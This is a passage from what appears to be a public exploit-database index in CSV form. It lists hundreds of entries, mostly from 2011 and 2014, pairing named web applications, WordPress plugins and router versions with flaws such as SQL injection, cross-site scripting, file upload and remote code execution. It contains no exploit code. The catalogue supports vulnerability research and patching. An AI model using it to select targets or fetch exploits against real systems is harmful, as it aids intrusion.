Execution",2014-11-22,"Taoguang Chen",webapps,php, +35324,exploits/php/webapps/35324.txt,"WordPress Plugin CM Download Manager 2.0.0 - Code Injection",2014-11-22,"Phi Ngoc Le",webapps,php, +35325,exploits/hardware/webapps/35325.txt,"NETGEAR WNR500 Wireless Router - 'webproc?getpage' Traversal Arbitrary File Access",2014-11-22,LiquidWorm,webapps,hardware, +35327,exploits/php/webapps/35327.txt,"CiviCRM 3.3.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"AutoSec Tools",webapps,php, +35328,exploits/php/webapps/35328.txt,"UMI CMS 2.8.1.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",webapps,php, +35329,exploits/php/webapps/35329.txt,"PHPXref 0.7 - 'nav.html' Cross-Site Scripting",2011-02-09,MustLive,webapps,php, +35330,exploits/php/webapps/35330.txt,"ManageEngine ADSelfService Plus 4.4 - POST Manipulation Security Question",2011-02-10,"Core Security",webapps,php, +35331,exploits/php/webapps/35331.txt,"ManageEngine ADSelfService Plus 4.4 - 'EmployeeSearch.cc' Multiple Cross-Site Scripting Vulnerabilities",2011-02-10,"Core Security",webapps,php, +35332,exploits/php/webapps/35332.txt,"Dolphin 7.0.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-10,"AutoSec Tools",webapps,php, +35333,exploits/php/webapps/35333.py,"webERP 4.0.1 - 'InputSerialItemsFile.php' Arbitrary File Upload",2011-02-10,"AutoSec Tools",webapps,php, +35334,exploits/php/webapps/35334.txt,"RunCMS 2.2.2 - 'register.php' SQL Injection",2011-02-10,"High-Tech Bridge SA",webapps,php, +35335,exploits/php/webapps/35335.html,"Drupal Module CAPTCHA - Security Bypass",2011-02-11,anonymous,webapps,php, +35336,exploits/php/webapps/35336.txt,"TaskFreak! 0.6.4 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2011-02-12,LiquidWorm,webapps,php, +35337,exploits/php/webapps/35337.txt,"TaskFreak! 0.6.4 - 'print_list.php' Multiple Cross-Site Scripting Vulnerabilities",2011-02-12,LiquidWorm,webapps,php, +35338,exploits/php/webapps/35338.txt,"TaskFreak! 0.6.4 - 'rss.php' HTTP Referer Header Cross-Site Scripting",2011-02-12,LiquidWorm,webapps,php, +35340,exploits/php/webapps/35340.txt,"WordPress Plugin wpDataTables 1.5.3 - SQL Injection",2014-11-24,"Claudio Viviani",webapps,php, +35341,exploits/php/webapps/35341.py,"WordPress Plugin wpDataTables 1.5.3 - Unauthenticated Arbitrary File Upload",2014-11-24,"Claudio Viviani",webapps,php, +35343,exploits/php/webapps/35343.txt,"Smarty Template Engine 2.6.9 - '$smarty.template' PHP Code Injection",2011-02-09,jonieske,webapps,php, +35344,exploits/php/webapps/35344.txt,"RobotStats 1.0 - 'robot' SQL Injection",2014-11-24,"ZoRLu Bugrahan",webapps,php, +35346,exploits/php/webapps/35346.txt,"WordPress Plugin DukaPress 2.5.2 - Directory Traversal",2014-11-24,"Kacper Szurek",webapps,php, +35347,exploits/php/webapps/35347.txt,"Dokeos 1.8.6 2 - 'style' Cross-Site Scripting",2011-02-12,"AutoSec Tools",webapps,php, +35348,exploits/php/webapps/35348.txt,"MG2 0.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,LiquidWorm,webapps,php, +35349,exploits/php/webapps/35349.txt,"Gollos 2.8 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",webapps,php, +35350,exploits/php/webapps/35350.txt,"Wikipad 1.6.0 - Cross-Site Scripting / HTML Injection / Information Disclosure",2011-02-15,"High-Tech Bridge SA",webapps,php, +35351,exploits/php/webapps/35351.txt,"Photopad 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",webapps,php, +35353,exploits/php/webapps/35353.txt,"Getsimple CMS 2.03 - 'upload-ajax.php' Arbitrary File Upload",2011-02-15,"s3rg3770 & Chuzz",webapps,php, +35357,exploits/cgi/webapps/35357.txt,"Advantech EKI-6340 - Command Injection",2014-11-24,"Core Security",webapps,cgi,80 +35360,exploits/php/webapps/35360.txt,"WSN Guest 1.24 - 'wsnuser' Cookie SQL Injection",2011-02-18,"Aliaksandr Hartsuyeu",webapps,php, +35362,exploits/php/webapps/35362.txt,"Batavi 1.0 - Multiple Local File Inclusion / Cross-Site Scripting Vulnerabilities",2011-02-21,"AutoSec Tools",webapps,php, +35365,exploits/php/webapps/35365.py,"PHPMyRecipes 1.2.2 - 'dosearch.php?words_exact' SQL Injection",2014-11-25,bard,webapps,php,80 +35367,exploits/php/webapps/35367.txt,"Crea8Social 1.3 - Persistent Cross-Site Scripting",2014-11-25,"Halil Dalabasmaz",webapps,php,80 +35371,exploits/php/webapps/35371.txt,"WordPress Plugin Google Document Embedder 2.5.14 - SQL Injection",2014-11-25,"Kacper Szurek",webapps,php,80 +35372,exploits/hardware/webapps/35372.rb,"Arris VAP2500 - Authentication Bypass",2014-11-25,HeadlessZeke,webapps,hardware,80 +35373,exploits/php/webapps/35373.txt,"WordPress Plugin GD Star Rating 1.9.7 - 'wpfn' Cross-Site Scripting",2011-02-22,"High-Tech Bridge SA",webapps,php, +35374,exploits/php/webapps/35374.txt,"IBM Lotus Sametime Server 8.0 - 'stcenter.nsf' Cross-Site Scripting",2011-02-22,andrew,webapps,php, +35375,exploits/php/webapps/35375.txt,"Vanilla Forums 2.0.17.x - 'p' Cross-Site Scripting",2011-02-22,"Aung Khant",webapps,php, +35376,exploits/php/webapps/35376.txt,"mySeatXT 0.164 - 'lang' Local File Inclusion",2011-02-16,"AutoSec Tools",webapps,php, +35378,exploits/php/webapps/35378.txt,"WordPress Plugin DB Backup - Arbitrary File Download",2014-11-26,"Ashiyane Digital Security Team",webapps,php,80 +35383,exploits/cgi/webapps/35383.rb,"Device42 WAN Emulator 2.3 - Traceroute Command Injection (Metasploit)",2014-11-26,"Brandon Perry",webapps,cgi,80 +35384,exploits/cgi/webapps/35384.rb,"Device42 WAN Emulator 2.3 - Ping Command Injection (Metasploit)",2014-11-26,"Brandon Perry",webapps,cgi,80 +35385,exploits/php/webapps/35385.pl,"WordPress Plugin Slider REvolution 3.0.95 / Showbiz Pro 1.7.1 - Arbitrary File Upload",2014-11-26,"Simo Ben Youssef",webapps,php,80 +35387,exploits/php/webapps/35387.txt,"phpShop 0.8.1 - 'page' Cross-Site Scripting",2011-02-25,"Aung Khant",webapps,php, +35391,exploits/php/webapps/35391.txt,"glFusion 1.1.x/1.2.1 - 'users.php' SQL Injection",2011-02-25,H3X,webapps,php, +35392,exploits/php/webapps/35392.txt,"WordPress Plugin IGIT Posts Slider Widget 1.0 - 'src' Cross-Site Scripting",2011-02-23,"AutoSec Tools",webapps,php, +35393,exploits/php/webapps/35393.txt,"WordPress Plugin ComicPress Manager 1.4.9 - 'lang' Cross-Site Scripting",2011-02-23,"AutoSec Tools",webapps,php, +35394,exploits/php/webapps/35394.txt,"WordPress Plugin YT-Audio 1.7 - 'v' Cross-Site Scripting",2011-02-23,"AutoSec Tools",webapps,php, +35396,exploits/php/webapps/35396.txt,"xEpan 1.0.4 - Multiple Vulnerabilities",2014-11-28,"Parikesit _ Kurawa",webapps,php, +35397,exploits/php/webapps/35397.txt,"Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting",2011-02-23,MustLive,webapps,php, +35400,exploits/php/webapps/35400.txt,"WordPress Plugin BackWPup 1.4 - Multiple Information Disclosure Vulnerabilities",2011-02-28,"Danilo Massa",webapps,php, +35401,exploits/php/webapps/35401.txt,"SnapProof - 'retPageID' Cross-Site Scripting",2011-02-28,"difficult 511",webapps,php, +35402,exploits/php/webapps/35402.txt,"Forritun - Multiple SQL Injections",2011-03-02,eXeSoul,webapps,php, +35405,exploits/php/webapps/35405.txt,"VidiScript - 'vp' Cross-Site Scripting",2011-03-02,NassRawI,webapps,php, +35406,exploits/php/webapps/35406.txt,"Support Incident Tracker (SiT!) 3.62 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-03,"AutoSec Tools",webapps,php, +35407,exploits/php/webapps/35407.txt,"phpWebSite 1.7.1 - 'local' Cross-Site Scripting",2011-03-03,"AutoSec Tools",webapps,php, +35408,exploits/php/webapps/35408.txt,"xtcModified 1.05 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",webapps,php, +35409,exploits/php/webapps/35409.txt,"Pragyan CMS 3.0 Beta - Multiple Cross-Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",webapps,php, +35410,exploits/windows/webapps/35410.py,"InterPhoto Image Gallery 2.4.2 - 'IPLANG' Local File Inclusion",2011-03-04,"AutoSec Tools",webapps,windows, +35411,exploits/asp/webapps/35411.txt,"Kodak InSite 5.5.2 - '/Troubleshooting/DiagnosticReport.asp?HeaderWarning' Cross-Site Scripting",2011-03-07,Dionach,webapps,asp, +35412,exploits/asp/webapps/35412.txt,"Kodak InSite 5.5.2 - '/Pages/login.aspx?Language' Cross-Site Scripting",2011-03-07,Dionach,webapps,asp, +35416,exploits/php/webapps/35416.txt,"Interleave 5.5.0.2 - 'basicstats.php' Multiple Cross-Site Scripting Vulnerabilities",2011-03-03,"AutoSec Tools",webapps,php, +35417,exploits/php/webapps/35417.php,"WS Interactive Automne 4.1 - '/admin/upload-controler.php' Arbitrary File Upload",2011-03-08,"AutoSec Tools",webapps,php, +35418,exploits/php/webapps/35418.txt,"WordPress Plugin Inline Gallery 0.3.9 - 'do' Cross-Site Scripting",2011-03-08,"High-Tech Bridge SA",webapps,php, +35419,exploits/hardware/webapps/35419.txt,"Prolink PRN2001 - Multiple Vulnerabilities",2014-12-02,"Herman Groeneveld",webapps,hardware, +35424,exploits/php/webapps/35424.py,"ProjectSend r-561 - Arbitrary File Upload",2014-12-02,"Fady Mohammed Osman",webapps,php, +36125,exploits/php/webapps/36125.txt,"Piwigo 2.7.3 - SQL Injection",2015-02-19,"Sven Schleier",webapps,php,80 +35428,exploits/php/webapps/35428.txt,"SQL Buddy 1.3.3 - Remote Code Execution",2014-12-02,"Fady Mohammed Osman",webapps,php, +35429,exploits/php/webapps/35429.txt,"WordPress Plugin PhotoSmash Galleries 1.0.x - 'action' Cross-Site Scripting",2011-03-08,"High-Tech Bridge SA",webapps,php, +35430,exploits/php/webapps/35430.txt,"WordPress Plugin 1 Flash Gallery 0.2.5 - Cross-Site Scripting / SQL Injection",2011-03-08,"High-Tech Bridge SA",webapps,php, +35431,exploits/php/webapps/35431.txt,"Ruubikcms 1.0.3 - 'head.php' Cross-Site Scripting",2011-03-08,"Khashayar Fereidani",webapps,php, +35435,exploits/php/webapps/35435.txt,"WordPress Plugin Lazyest Gallery 1.0.26 - 'image' Cross-Site Scripting",2011-03-10,"High-Tech Bridge SA",webapps,php, +35436,exploits/php/webapps/35436.txt,"Xinha 0.96 - 'spell-check-savedicts.php' Multiple HTML Injection Vulnerabilities",2011-03-10,"John Leitch",webapps,php, +35438,exploits/cgi/webapps/35438.txt,"Cosmoshop 10.05.00 - Multiple Cross-Site Scripting / SQL Injections",2011-03-10,"High-Tech Bridge SA",webapps,cgi, +35439,exploits/php/webapps/35439.txt,"WordPress Plugin Nextend Facebook Connect 1.4.59 - Cross-Site Scripting",2014-12-02,"Kacper Szurek",webapps,php,80 +35442,exploits/hardware/webapps/35442.txt,"EntryPass N5200 - Credentials Exposure",2014-12-02,"RedTeam Pentesting",webapps,hardware, +35443,exploits/php/webapps/35443.txt,"TYPO3 Extension ke DomPDF - Remote Code Execution",2014-12-02,"RedTeam Pentesting",webapps,php,80 +35444,exploits/php/webapps/35444.txt,"Lms Web Ensino - Multiple Input Validation Vulnerabilities",2011-03-04,waKKu,webapps,php, +35447,exploits/php/webapps/35447.txt,"WordPress Plugin Google Document Embedder 2.5.16 - mysql_real_escpae_string Bypass SQL Injection",2014-12-03,"Securely (Yoo Hee man)",webapps,php, +35451,exploits/php/webapps/35451.txt,"BoutikOne - 'categorie.php?path' SQL Injection",2011-03-14,cdx.security,webapps,php, +35452,exploits/php/webapps/35452.txt,"BoutikOne - 'list.php?path' SQL Injection",2011-03-14,cdx.security,webapps,php, +35453,exploits/php/webapps/35453.txt,"BoutikOne - 'search.php' Multiple SQL Injections",2011-03-14,cdx.security,webapps,php, +35454,exploits/php/webapps/35454.txt,"BoutikOne - 'rss_news.php?lang' SQL Injection",2011-03-14,cdx.security,webapps,php, +35455,exploits/php/webapps/35455.txt,"BoutikOne - 'rss_flash.php?lang' SQL Injection",2011-03-14,cdx.security,webapps,php, +35456,exploits/php/webapps/35456.txt,"BoutikOne - 'rss_promo.php?lang' SQL Injection",2011-03-14,cdx.security,webapps,php, +35457,exploits/php/webapps/35457.txt,"BoutikOne - 'rss_top10.php?lang' SQL Injection",2011-03-14,cdx.security,webapps,php, +35459,exploits/php/webapps/35459.txt,"WordPress Plugin Cart66 Lite eCommerce 1.5.1.17 - Blind SQL Injection",2014-12-03,"Kacper Szurek",webapps,php,80 +35460,exploits/php/webapps/35460.txt,"WordPress Plugin CodeArt Google MP3 Player - File Disclosure Download",2014-12-03,"QK14 Team",webapps,php,80 +35564,exploits/php/webapps/35564.txt,"DoceboLms 4.0.4 - 'index.php' Multiple HTML Injection Vulnerabilities",2011-04-03,LiquidWorm,webapps,php, +35565,exploits/php/webapps/35565.txt,"Gazelle CMS 1.0 - Cross-Site Scripting / SQL Injection",2011-04-04,"kurdish hackers team",webapps,php, +35462,exploits/hardware/webapps/35462.txt,"Technicolor DT5130 2.05.C29GV - Multiple Vulnerabilities",2014-12-04,Crash,webapps,hardware,80 +35463,exploits/cgi/webapps/35463.txt,"Advertise With Pleasure! (AWP) 6.6 - SQL Injection",2014-12-04,"Robert Cooper",webapps,cgi,80 +35467,exploits/php/webapps/35467.txt,"SugarCRM 6.1.1 - Information Disclosure",2011-03-15,"RedTeam Pentesting GmbH",webapps,php, +35469,exploits/php/webapps/35469.txt,"Wikiwig 5.01 - Cross-Site Scripting / HTML Injection",2011-03-10,"AutoSec Tools",webapps,php, +35470,exploits/php/webapps/35470.txt,"AplikaMedia CMS - 'page_info.php' SQL Injection",2011-03-16,H3X,webapps,php, +35473,exploits/php/webapps/35473.txt,"PBBoard CMS 3.0.1 - SQL Injection",2014-12-05,"Tran Dinh Tien",webapps,php,80 +35475,exploits/php/webapps/35475.txt,"WordPress Plugin Sodahead Polls 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-17,"High-Tech Bridge SA",webapps,php, +35476,exploits/php/webapps/35476.txt,"WordPress Plugin Rating-Widget 1.3.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-17,"Todor Donev",webapps,php, +35477,exploits/php/webapps/35477.txt,"XOOPS 2.x - Multiple Cross-Site Scripting Vulnerabilities",2011-03-18,"Aung Khant",webapps,php, +35479,exploits/php/webapps/35479.txt,"Web Poll Pro 1.0.3 - 'error' HTML Injection",2011-03-19,Hector.x90,webapps,php, +35480,exploits/php/webapps/35480.txt,"Online store PHP script - Multiple Cross-Site Scripting / SQL Injections",2011-03-21,"kurdish hackers team",webapps,php, +35481,exploits/php/webapps/35481.txt,"Newsportal 0.37 - 'post.php' Cross-Site Scripting",2011-03-21,"kurdish hackers team",webapps,php, +35482,exploits/php/webapps/35482.txt,"PluggedOut Blog 1.9.9 - 'year' Cross-Site Scripting",2011-03-21,"kurdish hackers team",webapps,php, +35490,exploits/php/webapps/35490.txt,"IceHrm 7.1 - Multiple Vulnerabilities",2014-12-08,LiquidWorm,webapps,php, +35492,exploits/php/webapps/35492.txt,"Free Article Submissions 1.0 - SQL Injection",2014-12-08,BarrabravaZ,webapps,php, +35493,exploits/php/webapps/35493.txt,"WordPress Plugin Ajax Store Locator 1.2 - Arbitrary File Download",2014-12-08,"Claudio Viviani",webapps,php, +35518,exploits/php/webapps/35518.txt,"OpenEMR 4.1.2(7) - Multiple SQL Injections",2014-12-10,Portcullis,webapps,php,80 +35496,exploits/php/webapps/35496.txt,"MC Content Manager 10.1.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-24,MustLive,webapps,php, +35497,exploits/php/webapps/35497.txt,"GrapeCity Data Dynamics Reports 1.6.2084.14 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-24,Dionach,webapps,php, +35498,exploits/php/webapps/35498.txt,"Ripe Website Manager 1.1 - Cross-Site Scripting / Multiple SQL Injections",2011-03-24,"High-Tech Bridge SA",webapps,php, +35499,exploits/php/webapps/35499.txt,"netjukebox 4.01B/5.25 - 'skin' Cross-Site Scripting",2011-03-24,"AutoSec Tools",webapps,php, +35500,exploits/php/webapps/35500.txt,"Family Connections 2.3.2 - 'subject' HTML Injection",2011-03-25,"Zero Science Lab",webapps,php, +35672,exploits/jsp/webapps/35672.txt,"Cisco Unified Communications Manager 8.5 - 'xmldirectorylist.jsp' Multiple SQL Injections",2011-04-27,"Alberto Revelli",webapps,jsp, +35673,exploits/php/webapps/35673.txt,"WordPress Plugin Daily Maui Photo Widget 0.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-04-28,"High-Tech Bridge SA",webapps,php, +35674,exploits/php/webapps/35674.txt,"WordPress Plugin WP Photo Album 1.5.1 - 'id' Cross-Site Scripting",2011-04-28,"High-Tech Bridge SA",webapps,php, +35675,exploits/php/webapps/35675.txt,"Kusaba X 0.9 - Multiple Cross-Site Scripting Vulnerabilities",2011-04-27,"Emilio Pinna",webapps,php, +35676,exploits/cgi/webapps/35676.txt,"BackupPC 3.x - 'index.cgi' Multiple Cross-Site Scripting Vulnerabilities",2011-04-28,"High-Tech Bridge SA",webapps,cgi, +35505,exploits/php/webapps/35505.txt,"WordPress Plugin Symposium 14.10 - SQL Injection",2014-12-09,"Kacper Szurek",webapps,php, +35506,exploits/php/webapps/35506.pl,"Flat Calendar 1.1 - HTML Injection",2014-12-09,"ZoRLu Bugrahan",webapps,php, +35508,exploits/php/webapps/35508.txt,"Cetera eCommerce - Multiple Cross-Site Scripting / SQL Injections",2011-03-27,MustLive,webapps,php, +35510,exploits/php/webapps/35510.txt,"Humhub 0.10.0-rc.1 - SQL Injection",2014-12-10,"Jos Wetzels_ Emiel Florijn",webapps,php, +35511,exploits/php/webapps/35511.txt,"Humhub 0.10.0-rc.1 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-12-10,"Jos Wetzels_ Emiel Florijn",webapps,php, +40817,exploits/java/webapps/40817.txt,"AppFusions Doxygen for Atlassian Confluence 1.3.2 - Cross-Site Scripting",2016-11-22,"Julien Ahrens",webapps,java, +35559,exploits/php/webapps/35559.txt,"MyBB 1.4/1.6 - Multiple Vulnerabilities",2011-04-04,MustLive,webapps,php, +35514,exploits/php/webapps/35514.txt,"OrangeHRM 2.6.2 - 'jobVacancy.php' Cross-Site Scripting",2011-03-27,"AutoSec Tools",webapps,php, +35515,exploits/php/webapps/35515.txt,"Alkacon OpenCMS 7.5.x - Multiple Cross-Site Scripting Vulnerabilities",2011-03-28,antisnatchor,webapps,php, +35516,exploits/php/webapps/35516.txt,"webEdition CMS 6.1.0.2 - 'DOCUMENT_ROOT' Local File Inclusion",2011-03-28,eidelweiss,webapps,php, +35557,exploits/php/webapps/35557.txt,"PHP-Fusion - 'article_id' SQL Injection",2011-04-04,KedAns-Dz,webapps,php, +35520,exploits/php/webapps/35520.txt,"Claroline 1.10 - Multiple HTML Injection Vulnerabilities",2011-03-28,"AutoSec Tools",webapps,php, +35521,exploits/php/webapps/35521.txt,"osCSS 2.1 - Multiple Cross-Site Scripting / Local File Inclusions",2011-03-29,"AutoSec Tools",webapps,php, +35522,exploits/php/webapps/35522.txt,"Spitfire 1.0.3x - 'cms_username' Cross-Site Scripting",2011-03-29,"High-Tech Bridge SA",webapps,php, +35523,exploits/php/webapps/35523.txt,"Tracks 1.7.2 - URI Cross-Site Scripting",2011-03-29,"Mesut Timur",webapps,php, +35524,exploits/php/webapps/35524.txt,"XOOPS - 'view_photos.php' Cross-Site Scripting",2011-03-29,KedAns-Dz,webapps,php, +35525,exploits/php/webapps/35525.txt,"GuppY 4.6.14 - 'lng' Multiple SQL Injections",2011-03-30,"kurdish hackers team",webapps,php, +35526,exploits/php/webapps/35526.txt,"YaCOMAS 0.3.6 OpenCMS - Multiple Cross-Site Scripting Vulnerabilities",2011-03-30,"Pr@fesOr X",webapps,php, +35528,exploits/php/webapps/35528.txt,"GLPI 0.85 - Blind SQL Injection",2014-12-15,"Kacper Szurek",webapps,php, +35529,exploits/windows/webapps/35529.txt,"Soitec SmartEnergy 1.4 - SCADA Login SQL Injection / Authentication Bypass",2014-12-15,LiquidWorm,webapps,windows, +35533,exploits/php/webapps/35533.py,"WordPress Plugin Download Manager 2.7.4 - Remote Code Execution",2014-12-15,"Claudio Viviani",webapps,php, +35548,exploits/php/webapps/35548.txt,"InTerra Blog Machine 1.84 - 'subject' HTML Injection",2011-03-31,"High-Tech Bridge SA",webapps,php, +35535,exploits/php/webapps/35535.php,"PHPads 213607 - Authentication Bypass / Password Change",2014-12-15,"Shaker msallm",webapps,php, +35561,exploits/php/webapps/35561.txt,"WordPress Plugin WPwizz AdWizz Plugin 1.0 - 'link' Cross-Site Scripting",2011-04-04,"John Leitch",webapps,php, +35562,exploits/php/webapps/35562.txt,"WordPress Plugin Placester 0.1 - 'ajax_action' Cross-Site Scripting",2011-04-03,"John Leitch",webapps,php, +35541,exploits/php/webapps/35541.txt,"ResourceSpace 6.4.5976 - Cross-Site Scripting / SQL Injection / Insecure Cookie Handling",2014-12-15,"Adler Freiheit",webapps,php, +35556,exploits/hardware/webapps/35556.txt,"CIK Telecom VoIP Router SVG6000RW - Privilege Escalation / Command Execution",2014-12-17,Chako,webapps,hardware, +35543,exploits/php/webapps/35543.txt,"WordPress Plugin WP Symposium 14.11 - Unauthenticated Arbitrary File Upload",2014-12-15,"Claudio Viviani",webapps,php, +35547,exploits/php/webapps/35547.txt,"ICJobSite 1.1 - 'pid' SQL Injection",2011-03-30,RoAd_KiLlEr,webapps,php, +35550,exploits/php/webapps/35550.txt,"Collabtive 0.6.5 - Multiple Remote Input Validation Vulnerabilities",2011-03-31,"High-Tech Bridge SA",webapps,php, +35551,exploits/php/webapps/35551.txt,"CMS Papoo 6.0.0 Rev. 4701 - Persistent Cross-Site Scripting",2014-12-16,"Steffen Rösemann",webapps,php,80 +35555,exploits/php/webapps/35555.txt,"AWCM 2.x - 'search.php' Cross-Site Scripting",2011-04-01,"Antu Sanadi",webapps,php, +35569,exploits/php/webapps/35569.txt,"XOOPS 2.5 - 'banners.php' Multiple Local File Inclusions",2011-04-04,KedAns-Dz,webapps,php, +35571,exploits/php/webapps/35571.txt,"TextPattern 4.2 - 'index.php' Cross-Site Scripting",2011-04-06,"kurdish hackers team",webapps,php, +35572,exploits/php/webapps/35572.txt,"Redmine 1.0.1/1.1.1 - 'projects/hg-hellowword/news/' Cross-Site Scripting",2011-04-06,"Mesut Timur",webapps,php, +35574,exploits/php/webapps/35574.txt,"vTiger CRM 5.2.1 - 'sortfieldsjson.php' Local File Inclusion",2011-04-08,"John Leitch",webapps,php, +35575,exploits/php/webapps/35575.txt,"PrestaShop 1.3.6 - 'cms.php' Remote File Inclusion",2011-04-08,KedAns-Dz,webapps,php, +35576,exploits/asp/webapps/35576.txt,"Omer Portal 3.220060425 - 'arama_islem.asp' Cross-Site Scripting",2011-04-07,"kurdish hackers team",webapps,asp, +35577,exploits/php/webapps/35577.txt,"vTiger CRM 5.2.1 - 'vtigerservice.php' Cross-Site Scripting",2011-04-07,"AutoSec Tools",webapps,php, +35578,exploits/php/webapps/35578.sh,"Cacti Superlinks Plugin 1.4-2 - SQL Injection / Local File Inclusion",2014-12-19,Wireghoul,webapps,php, +35579,exploits/php/webapps/35579.txt,"MiniBB 3.1 - Blind SQL Injection",2014-12-19,"Kacper Szurek",webapps,php,80 +35582,exploits/php/webapps/35582.txt,"ProjectSend r561 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,webapps,php,80 +35583,exploits/php/webapps/35583.txt,"Piwigo 2.7.2 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,webapps,php,80 +35584,exploits/php/webapps/35584.txt,"GQ File Manager 0.2.5 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,webapps,php,80 +35585,exploits/php/webapps/35585.txt,"Codiad 2.4.3 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,webapps,php,80 +35588,exploits/php/webapps/35588.rb,"Lotus Mail Encryption Server 2.1.0.1 (Protector for Mail) - Local File Inclusion / Remote Code Execution (Metasploit)",2014-12-22,"Patrick Webster",webapps,php,9000 +35591,exploits/php/webapps/35591.txt,"PHPMyRecipes 1.2.2 - 'browse.php?category' SQL Injection",2014-12-23,"Manish Tanwar",webapps,php,80 +35593,exploits/windows/webapps/35593.txt,"SysAid Server - Arbitrary File Disclosure",2014-12-23,"Bernhard Mueller",webapps,windows, +35594,exploits/jsp/webapps/35594.txt,"NetIQ Access Manager 4.0 SP1 - Multiple Vulnerabilities",2014-12-23,"SEC Consult",webapps,jsp,8443 +35596,exploits/php/webapps/35596.txt,"eGroupWare 1.8.1 - 'test.php' Cross-Site Scripting",2011-04-07,"AutoSec Tools",webapps,php, +35598,exploits/php/webapps/35598.txt,"1024 CMS 1.1.0 Beta - Multiple Input Validation Vulnerabilities",2011-04-08,"QSecure & Demetris Papapetrou",webapps,php, +35599,exploits/asp/webapps/35599.txt,"Dimac CMS 1.3 XS - 'default.asp' SQL Injection",2011-04-11,KedAns-Dz,webapps,asp, +35601,exploits/php/webapps/35601.txt,"Etki Video PRO 2.0 - 'izle.asp?id' SQL Injection",2011-04-11,Kurd-Team,webapps,php, +35602,exploits/php/webapps/35602.txt,"Etki Video PRO 2.0 - 'kategori.asp?cat' SQL Injection",2011-04-11,Kurd-Team,webapps,php, +35603,exploits/php/webapps/35603.txt,"WordPress Theme Live Wire 2.3.1 - Multiple Vulnerabilities",2011-04-11,MustLive,webapps,php, +35604,exploits/php/webapps/35604.txt,"eForum 1.1 - 'eforum.php' Arbitrary File Upload",2011-04-09,QSecure,webapps,php, +35605,exploits/php/webapps/35605.txt,"Lazarus Guestbook 1.22 - Multiple Vulnerabilities",2014-12-24,TaurusOmar,webapps,php,80 +35607,exploits/php/webapps/35607.txt,"WordPress Plugin Spellchecker 3.1 - '/general.php' Local/Remote File Inclusion",2011-04-12,"Dr Trojan",webapps,php, +35608,exploits/php/webapps/35608.txt,"WordPress Theme The Gazette Edition 2.9.4 - Multiple Vulnerabilities",2011-04-12,MustLive,webapps,php, +35610,exploits/php/webapps/35610.txt,"Plogger 1.0 RC1 - 'gallery_name' Cross-Site Scripting",2011-04-12,"High-Tech Bridge SA",webapps,php, +35611,exploits/php/webapps/35611.txt,"Website Baker 2.8.1 - Multiple SQL Injections",2011-04-12,"High-Tech Bridge SA",webapps,php, +35615,exploits/php/webapps/35615.txt,"PhpAlbum.net 0.4.1-14_fix06 - 'var3' Remote Command Execution",2011-04-14,"High-Tech Bridge SA",webapps,php, +35616,exploits/php/webapps/35616.txt,"Agahi Advertisement CMS 4.0 - 'view_ad.php' SQL Injection",2011-04-15,"Sepehr Security Team",webapps,php, +35617,exploits/php/webapps/35617.txt,"Qianbo Enterprise Web Site Management System - 'Keyword' Cross-Site Scripting",2011-04-14,d3c0der,webapps,php, +35618,exploits/php/webapps/35618.txt,"RunCMS Module Partners - 'id' SQL Injection",2011-04-15,KedAns-Dz,webapps,php, +35619,exploits/php/webapps/35619.txt,"PhoenixCMS 1.7 - Local File Inclusion / SQL Injection",2011-04-15,KedAns-Dz,webapps,php, +35621,exploits/php/webapps/35621.txt,"4Images 1.7.9 - Multiple Remote File Inclusions / SQL Injections",2011-04-16,KedAns-Dz,webapps,php, +35623,exploits/multiple/webapps/35623.txt,"Pimcore CMS 2.3.0/3.0 - SQL Injection",2014-12-27,Vulnerability-Lab,webapps,multiple, +35624,exploits/php/webapps/35624.txt,"phpList 3.0.6/3.0.10 - SQL Injection",2014-12-27,Vulnerability-Lab,webapps,php, +35625,exploits/php/webapps/35625.txt,"PMB 4.1.3 - Authenticated SQL Injection",2014-12-27,"xd4rker dark",webapps,php, +35626,exploits/php/webapps/35626.txt,"Easy File Sharing Web Server 6.8 - Persistent Cross-Site Scripting",2014-12-27,"Sick Psycko",webapps,php, +35629,exploits/php/webapps/35629.txt,"ChillyCMS 1.2.1 - Multiple Remote File Inclusions",2011-04-16,KedAns-Dz,webapps,php, +35630,exploits/php/webapps/35630.txt,"Joomla! Component com_phocadownload - Local File Inclusion",2011-04-18,KedAns-Dz,webapps,php, +35631,exploits/php/webapps/35631.txt,"CRESUS - 'recette_detail.php' SQL Injection",2011-04-19,"GrayHatz Security Group",webapps,php, +35632,exploits/php/webapps/35632.txt,"XOOPS 2.5 - 'imagemanager.php' Local File Inclusion",2011-04-18,KedAns-Dz,webapps,php, +35633,exploits/php/webapps/35633.txt,"Ultra Marketing Enterprises CMS and Cart - Multiple SQL Injections",2011-04-19,eXeSoul,webapps,php, +35634,exploits/php/webapps/35634.txt,"WordPress Plugin WP-StarsRateBox 1.1 - 'j' SQL Injection",2011-04-19,"High-Tech Bridge SA",webapps,php, +35635,exploits/php/webapps/35635.txt,"Dalbum 1.43 - 'editini.php' Cross-Site Scripting",2011-04-19,"High-Tech Bridge SA",webapps,php, +35636,exploits/php/webapps/35636.txt,"ChatLakTurk PHP Botlu Video - 'ara.php' Cross-Site Scripting",2011-04-19,"kurdish hackers team",webapps,php, +35643,exploits/php/webapps/35643.txt,"webSPELL 4.2.2a - Multiple Cross-Site Scripting Vulnerabilities",2011-04-19,"High-Tech Bridge SA",webapps,php, +35659,exploits/php/webapps/35659.txt,"Social Microblogging 